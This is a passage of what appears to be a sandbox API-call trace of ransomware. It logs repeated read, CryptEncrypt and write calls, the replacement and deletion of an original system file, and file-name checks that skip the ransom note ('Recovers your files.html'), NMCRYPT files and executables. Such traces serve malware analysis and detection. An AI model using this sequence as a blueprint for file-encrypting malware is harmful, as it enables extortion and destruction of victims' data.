nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.385] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.385] GetLastError () returned 0x0 [0169.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.385] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.385] GetLastError () returned 0x0 [0169.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.385] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.385] GetLastError () returned 0x0 [0169.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.385] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.385] GetLastError () returned 0x0 [0169.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.386] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.386] GetLastError () returned 0x0 [0169.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.386] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.386] GetLastError () returned 0x0 [0169.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.386] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.386] GetLastError () returned 0x0 [0169.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.386] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.386] GetLastError () returned 0x0 [0169.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.386] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.386] GetLastError () returned 0x0 [0169.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.387] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.387] GetLastError () returned 0x0 [0169.387] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.387] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.387] GetLastError () returned 0x0 [0169.387] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.387] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.387] GetLastError () returned 0x0 [0169.387] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.387] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.387] GetLastError () returned 0x0 [0169.387] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.387] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.388] GetLastError () returned 0x0 [0169.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.388] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.388] GetLastError () returned 0x0 [0169.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.388] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.388] GetLastError () returned 0x0 [0169.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.388] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.388] GetLastError () returned 0x0 [0169.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.388] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.388] GetLastError () returned 0x0 [0169.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.388] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.388] GetLastError () returned 0x0 [0169.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.389] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.389] GetLastError () returned 0x0 [0169.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.389] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.389] GetLastError () returned 0x0 [0169.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.389] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.389] GetLastError () returned 0x0 [0169.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.389] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.389] GetLastError () returned 0x0 [0169.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.389] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.389] GetLastError () returned 0x0 [0169.389] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.390] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.390] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.390] GetLastError () returned 0x0 [0169.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.390] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.390] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.390] GetLastError () returned 0x0 [0169.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.390] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.390] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0169.390] GetLastError () returned 0x0 [0169.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0169.390] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0169.390] WriteFile (in: hFile=0x15c4, lpBuffer=0x2893368*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0169.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui")) returned 0x20 [0169.391] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui", dwFileAttributes=0x20) returned 0 [0169.391] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned 1 [0169.391] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui")) returned 0 [0169.391] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" [0169.391] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 1 [0169.391] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX949.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx949.tmp")) returned 0x949 [0169.392] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX949.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx949.tmp"), dwFlags=0x1) returned 0 [0169.392] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX949.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx949.tmp")) returned 1 [0169.393] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0169.393] wcslen (_String="OK") returned 0x2 [0169.393] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.393] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.393] CryptDestroyKey (hKey=0x9ad138) returned 1 [0169.393] CryptDestroyHash (hHash=0x9ad478) returned 1 [0169.393] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0169.393] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*NMCRYPT") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*.exe") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*.dll") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*.lnk") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*.bat") returned 0 [0169.393] PathMatchSpecW (pszFile="msdaremr.dll.mui", pszSpec="*.ini") returned 0 [0169.393] 